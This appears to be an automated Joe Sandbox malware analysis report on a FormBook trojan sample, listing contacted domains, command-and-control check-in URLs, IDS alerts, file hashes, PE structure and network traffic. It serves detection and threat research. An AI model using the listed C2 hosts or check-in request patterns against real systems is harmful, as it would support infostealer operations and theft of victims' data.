                                                                                                                                                        https://www.msn.com/en-us/lifestyle/shopping/the-21-best-walking-shoes-to-wear-wherever-you-go/ss-AAexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                          unknown
                                                                                                                                                          http://www.free-cell-phones-en-arena.sbs/cr12/www.84031.vipexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                            unknown
                                                                                                                                                            http://www.thetrendingproduct.com/cr12/explorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                              unknown
                                                                                                                                                              https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA12QGB8-darkexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                unknown
                                                                                                                                                                http://www.epuar.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                  unknown
                                                                                                                                                                  http://www.lotusluxecandle.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                    unknown
                                                                                                                                                                    http://www.twitter.com/scishowexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                      unknown
                                                                                                                                                                      https://movieweb.com/historically-accurate-war-movies/#we-were-soldiersexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                        unknown
                                                                                                                                                                        http://schemas.microexplorer.exe, 00000006.00000002.35227465445.000000000A590000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35227096684.0000000009FB0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000006.00000002.35221059449.0000000002B10000.00000002.00000001.00040000.00000000.sdmpfalse
                                                                                                                                                                          unknown
                                                                                                                                                                          http://www.footresort.com/cr12/www.priuswuxi.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                            unknown
                                                                                                                                                                            http://www.thetrendingproduct.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                              unknown
                                                                                                                                                                              https://powerpoint.office.com?explorer.exe, 00000006.00000003.31964592682.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.00000000090AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.00000000090AA000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                unknown
                                                                                                                                                                                https://www.msn.com/en-us/news/crime/colorado-man-s-silver-chain-saves-his-life-after-bullet-becomesexplorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                  unknown
                                                                                                                                                                                  https://www.msn.com/en-us/movies/news/netflix-users-celebrate-as-2023-masterpiece-finally-debuts-onlexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://aka.ms/odirmexplorer.exe, 00000006.00000003.31961855101.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30297542388.0000000008FDA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31964592682.000000000905E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35225441200.000000000905F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                      unknown
                                                                                                                                                                                      http://www.ferradaoffroad.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                        unknown
                                                                                                                                                                                        https://excel.office.coml0explorer.exe, 00000006.00000002.35229091915.000000000C5E0000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301008086.000000000C5E0000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                          unknown
                                                                                                                                                                                          http://www.bolinkpass.clubReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                            unknown
                                                                                                                                                                                            http://www.carneden.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://www.youtube.com/watch?v=cbN37yRV-ZYexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://windows.msn.com:443/shell?osLocale=en-US&chosenMarketReason=ImplicitNewexplorer.exe, 00000006.00000003.32855359805.000000000C8AA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31959682065.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000000.30301220528.000000000C87F000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000002.35229680320.000000000C87F000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                  unknown
                                                                                                                                                                                                  http://www.carneden.com/cr12/www.pedandmore.comexplorer.exe, 00000006.00000002.35224772424.0000000008EF1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                    unknown
                                                                                                                                                                                                    http://www.sugardefender24-usa.usReferer:explorer.exe, 00000006.00000003.31965408992.0000000008EF1000.00000004.00000001.00020000.00000000.sdmpfalse
                                                                                                                                                                                                      unknown
                                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                                      • 75% < No. of IPs
IP              | Domain                  | Country       | ASN    | ASN Name                               | Malicious
103.224.212.213 | www.bolinkpass.club     | Australia     | 133618 | TRELLIAN-AS-AP Trellian Pty Limited AU | true
172.67.182.124  | www.spiritualpath.info  | United States | 13335  | CLOUDFLARENET US                       | true
Joe Sandbox version: 40.0.0 Tourmaline
Analysis ID: 1450804
Start date and time: 2024-06-03 08:44:32 +02:00
Joe Sandbox product: CloudBasic
Overall analysis duration: 0h 18m 39s
Hypervisor based Inspection enabled: false
Report type: full
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit 20H2 Native physical Machine for testing VM-aware malware (Office 2019, Chrome 93, Firefox 91, Adobe Reader DC 21, Java 8 Update 301)
Run name: Suspected Instruction Hammering
Number of new started processes analysed: 9
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 1
Technologies:
• HCA enabled
• EGA enabled
• AMSI enabled
Analysis Mode: default
Sample name: yPURXYpFVuXra2o.exe
Detection: MAL
Classification: mal100.troj.evad.winEXE@520/1@23/2
EGA Information:
• Successful, ratio: 100%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 182
• Number of non-executed functions: 315
Cookbook Comments:
• Found application associated with file extension: .exe
• Sleeps longer than 100000000 ms are automatically reduced to 1000 ms
• Exclude process from analysis (whitelisted): dllhost.exe, RuntimeBroker.exe, backgroundTaskHost.exe, svchost.exe
• Excluded domains from analysis (whitelisted): spclient.wg.spotify.com, ecs.office.com
• Not all processes were analyzed; the report is missing behavior information
• Report creation exceeded the maximum time and may have missing disassembly code information.
• Report size exceeded maximum capacity and may have missing behavior information.
• Report size exceeded maximum capacity and may have missing disassembly code.
• Report size getting too big: too many NtEnumerateKey calls found.
• Report size getting too big: too many NtOpenKey calls found.
• Report size getting too big: too many NtOpenKeyEx calls found.
• Report size getting too big: too many NtQueryValueKey calls found.
Time      Type             Description
02:47:39  API Interceptor  15277362x Sleep call for process: cscript.exe modified
02:47:48  API Interceptor  18759828x Sleep call for process: explorer.exe modified
Match: 103.224.212.213
Associated Sample Name / URL | Detection | Threat Name | Context
Ajanlatkeres_2024.05.29.PDF.exe | malicious | FormBook, Lokibot
• www.vivaness.club/dn03/?KvOx3=rTguiTyPWe+LQ3wbOsvLrlRt5HkRD6mO+8zHcQ1TTPZ93ZKF8Svri6qQbYlnCi86X6wl&LhEx=ODKXZDVpY2w8gpmp
Solicitud de pedido Documento No 168646080.exe | malicious | FormBook, PureLog Stealer
• www.yassa-hany.online/pz08/?cx=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMZpBqNAn8DKeRhHzw==&CR=_DHhAtX
DHL Factura Electronica Pendiente documento No 04BB25083.exe | malicious | FormBook, PureLog Stealer
• www.yassa-hany.online/pz08/?N6Ahw=3ffl2F0Punah42&Ap=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuP1PGrx4qdiR
PaDQmSw2ud.dll | malicious | Laplas Clipper
• searchseedphase.online/bot/regex
PaDQmSw2ud.dll | malicious | Laplas Clipper
• searchseedphase.online/bot/regex
Documento de confirmacion de orden de compra OC 1580070060.exe | malicious | FormBook
• www.yassa-hany.online/pz08/?mzrPV4R=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVpBqNDhq+c&Rl=8pFP0r98Chvt5p5P
2024-09C33T37.exe | malicious | FormBook
• www.jeffwertdesign.com/ve92/?K2M8bVC=FFlo4/TKNXAR7V12oAudCGusg/tK2zFE/4uuQQ9Wgy0sGP4AKi+QV1PLyZgh2gAJGU7I&tXC=BDK02VJ87dHtUzo
rBCPcomprobante.exe | malicious | FormBook
• www.yassa-hany.online/pz08/?CrFT7j=ftx8Clc09Ned3F&pR-l7PfH=QdC7EAnI8ZBK6KsnIEDwiNoe1wSidTgePl3trAKN/Agbi7tcJn0SHRDVuMVQNLhAw6fb
Proforma_Invoice.exe | malicious | DBatLoader, FormBook
• www.epansion.com/ao65/?BR-hMX=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+a5ltJSnpB6j&Gzu=sFNxH
003425425124526.exe | malicious | DBatLoader, FormBook
• www.epansion.com/ao65/?GR0=rvO+ATiOvXVjo/S2H7FppiqdWdEaFhxw3FA4xmox9z3FoZLInDsOyhar+atqjoikrWmu&IDK=RJBh5RS0IZO8zhrP
Match | Associated Sample Name / URL | Detection | Threat Name | Context
www.veryaroma.com | yiLe926pJsBgixu.exe | malicious | FormBook
• 188.114.97.3
www.sugardefender24-usa.us.cdn.hstgr.net | wkUOj276sJEoMFq.exe | malicious | FormBook
• 84.32.84.128
www.sugardefender24-usa.us.cdn.hstgr.net | uBp1DxNGN28IYUZ.exe | malicious | FormBook
• 84.32.84.46
parkingpage.namecheap.com | yiLe926pJsBgixu.exe | malicious | FormBook
• 91.195.240.19
parkingpage.namecheap.com | PAYROLL LIST.exe | malicious | FormBook
• 91.195.240.19
parkingpage.namecheap.com | RFQ 5654077845567895504_d0c.exe | malicious | FormBook
• 91.195.240.19
parkingpage.namecheap.com | PO#2492150 May 29 2024.exe | malicious | FormBook, PureLog Stealer
• 91.195.240.19
parkingpage.namecheap.com | Factura 02297-23042024.exe | malicious | FormBook, GuLoader
• 91.195.240.19
parkingpage.namecheap.com | anebilledes.exe | malicious | FormBook, GuLoader
• 91.195.240.19
parkingpage.namecheap.com | Ajanlatkeres_2024.05.29.PDF.exe | malicious | FormBook, Lokibot
• 91.195.240.19
parkingpage.namecheap.com | Mekanikken.exe | malicious | FormBook, GuLoader
• 91.195.240.19
parkingpage.namecheap.com | Scan Document_doc.exe | malicious | FormBook
• 91.195.240.19
parkingpage.namecheap.com | SecuriteInfo.com.Win32.PWSX-gen.24627.22980.exe | malicious | FormBook
• 91.195.240.19
www.free-cell-phones-en-arena.sbs | yiLe926pJsBgixu.exe | malicious | FormBook
• 64.190.62.22
www.spiritualpath.info | wkUOj276sJEoMFq.exe | malicious | FormBook
• 188.114.97.3
www.warehouse-inventory-80963.bond | uBp1DxNGN28IYUZ.exe | malicious | FormBook
• 185.53.179.94
fq.54cdn.vip | yiLe926pJsBgixu.exe | malicious | FormBook
• 40.81.24.207
www.henslotalt.us | yiLe926pJsBgixu.exe | malicious | FormBook
• 188.114.97.3
Match | Associated Sample Name / URL | Detection | Threat Name | Context
TRELLIAN-AS-AP Trellian Pty Limited AU | PO#2492150 May 29 2024.exe | malicious | FormBook, PureLog Stealer
• 103.224.212.211
TRELLIAN-AS-AP Trellian Pty Limited AU | po8909893299832.exe | malicious | FormBook
• 103.224.212.212
TRELLIAN-AS-AP Trellian Pty Limited AU | Ajanlatkeres_2024.05.29.PDF.exe | malicious | FormBook, Lokibot
• 103.224.212.213
TRELLIAN-AS-AP Trellian Pty Limited AU | http://www.adrus.com/extranet/csxEquipment/EquipmentSpecifications/cs_SpecificationMainPage.htm | malicious | Unknown
• 103.224.182.246
TRELLIAN-AS-AP Trellian Pty Limited AU | Details of Your Etisalat Summary Bill for the Month of May 2024.exe | malicious | FormBook
• 103.224.212.212
TRELLIAN-AS-AP Trellian Pty Limited AU | file.exe | malicious | CMSBrute
• 103.224.212.214
TRELLIAN-AS-AP Trellian Pty Limited AU | HELP_DECRYPT.HTML | malicious | Unknown
• 103.224.212.237
TRELLIAN-AS-AP Trellian Pty Limited AU | SlHgSOYcMY.exe | malicious | Unknown
• 103.224.212.34
TRELLIAN-AS-AP Trellian Pty Limited AU | Erzs#U00e9bet - #U00e1raj#U00e1nlat k#U00e9r#U00e9se.xlsm | malicious | FormBook
• 103.224.212.214
TRELLIAN-AS-AP Trellian Pty Limited AU | Swift Copy.exe | malicious | FormBook, PureLog Stealer
• 103.224.212.217
CLOUDFLARENET US | file.xe.exe | malicious | AgentTesla
• 172.67.196.55
CLOUDFLARENET US | http://www.sharepoint-atp.com/ | malicious | Unknown
• 1.1.1.1
CLOUDFLARENET US | hhghhg.exe | malicious | FormBook
• 188.114.96.3
CLOUDFLARENET US | PAYMENT SWIFT.exe | malicious | FormBook
• 104.21.40.171
CLOUDFLARENET US | Purchase Order_20240503.exe | malicious | FormBook
• 188.114.97.3
CLOUDFLARENET US | Scanned Documents.exe | malicious | FormBook
                                                                                                                                                                                                      • 188.114.97.3
                                                                                                                                                                                                      Reconfirm bank details.rar.exeGet hashmaliciousFormBookBrowse
                                                                                                                                                                                                      • 172.67.137.210
                                                                                                                                                                                                      https://ids.calfrom.org/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      SecuriteInfo.com.Exploit.CVE-2018-0798.4.4196.18392.rtfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                                      • 172.67.175.222
                                                                                                                                                                                                      Setup_v1.9.3.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                                      • 188.114.96.3
                                                                                                                                                                                                      No context
                                                                                                                                                                                                      No context
Process: C:\Users\user\Desktop\yPURXYpFVuXra2o.exe
File Type: ASCII text, with CRLF line terminators
Category: dropped
Size (bytes): 1577
Entropy (8bit): 5.370304635803193
Encrypted: false
SSDEEP: 48:MxHK1Bj1qHDL0HKOYHKh6oPHKObtHoAhAHKzGvj:iq1FwjL0qOYqh6oPqObtIAeqzGb
MD5: 4E503E14E03BC1FCA85A5BD5FDDD4BA7
SHA1: E78B45726F7B102DAA455D748A0A0583D39C68CD
SHA-256: 2E53E6180FCBD2594BDEF5740C5D692C97D4CF0B3671D445F86F73118E26486F
SHA-512: 0064ED5628F2084EDFB3CE846E4B6FE776C9E8F702BC3495D40B0336592CEE1DE612AF50A2AA7D5439DBF3255DC150BC5F6A75488BEF875B24D0906072413D0C
Malicious: false
Reputation: low
Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\827465c25133ff582ff7ddaf85635407\System.ni.dll",0..3,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Drawing\9071a2976b2ef0ee49d0396431277b05\System.Drawing.ni.dll",0..3,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Windows.Forms\ca77152be4cd7af9700becb268864b42\System.Windows.Forms.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\374ae62ebbde44ef97c7e898f1fdb21b\System.Core.ni.dll",0..3,"System.Data, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Dat

File type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Entropy (8bit): 7.617157252167406
TrID:
• Win32 Executable (generic) Net Framework (10011505/4) 49.83%
• Win32 Executable (generic) a (10002005/4) 49.78%
• Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
• Generic Win/DOS Executable (2004/3) 0.01%
• DOS Executable Generic (2002/1) 0.01%
File name: yPURXYpFVuXra2o.exe
File size: 814'592 bytes
MD5: 6c73961037087d34597fc8a582388bcc
SHA1: fc96081d921b7f82b9c559ffc335b02364199fd7
SHA256: 93815b97bf6c09abc9e705096381dd25b658853e0751f7b95cc51123c251bcf2
SHA512: 140b6064ecd453809a8a4a8d0fc1f2c82644fa53324c1d1995d4399f7d4f7db14d22dd6cdd9218c17d3d093e5be84667b0ed8f25690d1add9a3e43aa286536ce
SSDEEP: 24576:zMYeWygN5iwSC6OJCa0jIOGFmGJlNmvcu:zMYeqN5idN6X0jvARNmUu
TLSH: 8405DF00F3E83E5BD5BB95BA8134950847F97895709BD6CC6CC078DE8EE6B410B6326B
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]f..............0..P...........n... ........@.. ....................................@................................
Icon Hash: 31d0f8dac6d6ca74
Entrypoint: 0x4c6eae
Entrypoint Section: .text
Digitally signed: false
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp: 0x665D1311 [Mon Jun 3 00:49:21 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 4
OS Version Minor: 0
File Version Major: 4
File Version Minor: 0
Subsystem Version Major: 4
Subsystem Version Minor: 0
Import Hash: f34d5f2d4577ed6d9ceec516c1f5a744

Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al
mov al, byte ptr [DC000041h]
inc edx
add byte ptr [eax], al
fadd qword ptr [edx+00h]
add byte ptr [esi], dl
inc ebx
add byte ptr [eax], al
jo 00007F2221005C94h
add byte ptr [eax], al
jo 00007F2221005C94h
add byte ptr [eax], al
jo 00007F2221005C94h
add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
                                                                                                                                                                                                      add byte ptr [eax], al
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xc6e5c | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xc8000 | 0x1814 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xca000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xc4ed4 | 0xc5000 | 658fb43ecedc10bd8ffb20b6385f012f | False | 0.7797665668623096 | data | 7.625137960095419 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xc8000 | 0x1814 | 0x1a00 | 86660c792535e8b6b6f1cfd30629a5cf | False | 0.7578125 | data | 6.939057653031406 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xca000 | 0xc | 0x200 | 8de546e2f1fdee73c3fd376c79e1280a | False | 0.044921875 | data | 0.09800417566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc80c8 | 0x13ea | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | | | 0.8976069046684975
RT_GROUP_ICON | 0xc94c4 | 0x14 | data | | | 1.05
RT_VERSION | 0xc94e8 | 0x328 | data | | | 0.4381188118811881
DLL | Import
mscoree.dll | _CorExeMain
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
06/03/24-08:51:59.597269 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50420 | 80 | 192.168.11.20 | 172.67.185.213
06/03/24-08:54:04.267969 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50424 | 80 | 192.168.11.20 | 40.81.24.207
06/03/24-08:55:06.601778 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50425 | 80 | 192.168.11.20 | 66.94.112.248
06/03/24-08:48:54.513491 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50413 | 80 | 192.168.11.20 | 172.67.158.76
06/03/24-08:49:36.291491 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50415 | 80 | 192.168.11.20 | 40.81.24.207
06/03/24-08:53:21.780359 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50422 | 80 | 192.168.11.20 | 3.33.130.190
06/03/24-08:53:42.406609 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50423 | 80 | 192.168.11.20 | 64.190.62.22
06/03/24-08:50:16.815432 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50416 | 80 | 192.168.11.20 | 3.33.130.190
06/03/24-08:50:57.933052 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50418 | 80 | 192.168.11.20 | 104.21.11.125
06/03/24-08:47:33.122866 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50410 | 80 | 192.168.11.20 | 103.224.212.213
06/03/24-08:47:53.631791 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50411 | 80 | 192.168.11.20 | 172.67.182.124
06/03/24-08:50:37.423270 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50417 | 80 | 192.168.11.20 | 103.169.142.0
06/03/24-08:51:18.553227 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50419 | 80 | 192.168.11.20 | 91.195.240.19
06/03/24-08:48:13.875537 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50412 | 80 | 192.168.11.20 | 84.32.84.251
06/03/24-08:52:40.866374 | TCP | 2031412 | ET TROJAN FormBook CnC Checkin (GET) | 50421 | 80 | 192.168.11.20 | 104.247.81.94
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Jun 3, 2024 08:47:32.961553097 CEST | 50410 | 80 | 192.168.11.20 | 103.224.212.213
Jun 3, 2024 08:47:33.122607946 CEST | 80 | 50410 | 103.224.212.213 | 192.168.11.20
Jun 3, 2024 08:47:33.122802973 CEST | 50410 | 80 | 192.168.11.20 | 103.224.212.213
Jun 3, 2024 08:47:33.122865915 CEST | 50410 | 80 | 192.168.11.20 | 103.224.212.213
Jun 3, 2024 08:47:33.326399088 CEST | 80 | 50410 | 103.224.212.213 | 192.168.11.20
Jun 3, 2024 08:47:33.339585066 CEST | 80 | 50410 | 103.224.212.213 | 192.168.11.20
Jun 3, 2024 08:47:33.339649916 CEST | 80 | 50410 | 103.224.212.213 | 192.168.11.20
Jun 3, 2024 08:47:33.339956999 CEST | 50410 | 80 | 192.168.11.20 | 103.224.212.213
Jun 3, 2024 08:47:33.339956999 CEST | 50410 | 80 | 192.168.11.20 | 103.224.212.213
Jun 3, 2024 08:47:33.501199961 CEST | 80 | 50410 | 103.224.212.213 | 192.168.11.20
Jun 3, 2024 08:47:53.501173973 CEST | 50411 | 80 | 192.168.11.20 | 172.67.182.124
Jun 3, 2024 08:47:53.631489992 CEST | 80 | 50411 | 172.67.182.124 | 192.168.11.20
Jun 3, 2024 08:47:53.631732941 CEST | 50411 | 80 | 192.168.11.20 | 172.67.182.124
Jun 3, 2024 08:47:53.631791115 CEST | 50411 | 80 | 192.168.11.20 | 172.67.182.124
Jun 3, 2024 08:47:53.762202024 CEST | 80 | 50411 | 172.67.182.124 | 192.168.11.20
Jun 3, 2024 08:47:54.139292955 CEST | 50411 | 80 | 192.168.11.20 | 172.67.182.124
Jun 3, 2024 08:47:54.270402908 CEST | 80 | 50411 | 172.67.182.124 | 192.168.11.20
Jun 3, 2024 08:47:54.270591974 CEST | 50411 | 80 | 192.168.11.20 | 172.67.182.124
